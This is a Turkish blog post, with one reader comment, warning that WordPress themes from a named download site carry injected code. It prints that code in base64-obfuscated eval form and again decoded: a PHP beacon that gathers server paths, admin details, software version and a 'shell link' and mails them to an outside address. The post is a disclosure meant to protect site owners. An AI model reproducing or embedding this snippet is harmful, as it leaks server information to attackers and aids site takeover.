İnternet üzerinde WordPress ilk geçtiğim ilk kullandığım dönemlerde yeni tanıştığım cana yakın biri Suat TÜRKMEN arkadaşımın teması hakkında size bilgi vermek istiyorum.Dün kendi sitesine girdim. Bir makalesi dikkatimi çekti! Makalesinde kendi emeğiyle kendi bilgileri doğrultusunda hazırladığı WordPress temasını başka bir sitede düzeltilerek şifreli kodların olduğunu anlatmış. Sitenin adreside www.wptr.net bu siteden tema indirmede dikkatli olun arkadaşlar. Bana kalırsa hiçbir temasını indirmeyin. Nedenide şu;
Fazla bilmiş kişi abc.txt diye bir dosya atmış Suat arkadaşımın temasına.Temadaki görüntüde

header.php harici, headers.php adıyla bir dosya daha eklenmiş ve temel dosyalara ilişkilendirilip şifrelenmiş.  Resimde de dosya ve klasörler oluşturmaya başlayıp, dosya izinleriyle, yetkilerle oynamışlar. Casus dosyaların içinde şifrelenmiş şekilde şu satırlar var.

Şifrelenmiş kod ise;

[php]<? <a href="http://www.php.net/eval">eval</a>(<a href="http://www.php.net/base64_decode">base64_decode</a>("JGtpbWU9ImluZGlyZWxpbWhlbWVuQGdtYWlsLmNvbSI7DQokYmFzbGlrPSJXb3JkUHJlc1MgVGVtYSBTdyBBdmNpc2kgVjMuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBBZG1pbiA6ICIuJF9TRVJWRVJbJ1NFUlZFUl9BRE1JTiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJTZXJ2ZXIgaXNsZXRpbSBzaXN0ZW1pIDogIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNoZWxsIExpbmsgOiBodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXS4icm4iOw0KJEVMX011SGFNTWVELj0iQXZsYW5hbiBTaXRlIDogIiAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiJybiI7DQptYWlsKCRraW1lLCAkYmFzbGlrLCAkRUxfTXVIYU1NZUQpOw=="));?>[/php]

Suat arkadaşımızın hazırladığı öz temasında ise şifrelenmemiş şeklide aşşağıdaki kod.
[php]z&#65533;�r�^$kime="[email protected]"; $baslik="WordPresS Tema Sw Avcisi V3.0"; $EL_MuHaMMeD="Dosya Yolu : ".$_SERVER[‘DOCUMENT_ROOT’]."rn"; $EL_MuHaMMeD.="Server Admin : ".$_SERVER[‘SERVER_ADMIN’]."rn"; $EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER[‘SERVER_SOFTWARE’]."rn"; $EL_MuHaMMeD.="Shell Link : http://".$_SERVER[‘SERVER_NAME’].$_SERVER[‘PHP_SELF’]."rn"; $EL_MuHaMMeD.="Avlanan Site : " .$_SERVER[‘HTTP_HOST’]."rn"; <a href="http://www.php.net/mail">mail</a>($kime, $baslik, $EL_MuHaMMeD);[/php]
Size tavsitem arkadaşlar Bu siteden, yani http://www.wptr.net isimli siteden indirdiğiniz her tema bunun gibidir. Dikkatli olun ve benim temam dahil tüm temaları resmi sitelerinden indirmeye dikkat edin.
Bizi bilgilendirdiğin için teşekkürler Suat.Yapacağın birşeyin olmadığını biliyorum. Sana tavsiyem artık yaptığın temaları kendin kullan. Yeni tema yazdığında eski temanı emeğin karşılığı olarak satmanı tavsiye ederim. Sen ve sen gibilerin başı çok yanar.Tekrar geçmiş olsun. Başarılar Suat..

2 YORUMLAR

  1. Kod Açıklaması : Arkadaşlar Mail Yollunu kullanıp Sitenizin Adını admin bilgilerini Sunucu Versiyonunu Dahil Bütün Bilgilerinizi Çekiyor Dikkat Edin İndirmeyin Sitenizin Güvenliği için.. Bu arada Notu Yazan Emre Yildirıma Teşekür Ediyorum..

Bir Cevap Yazın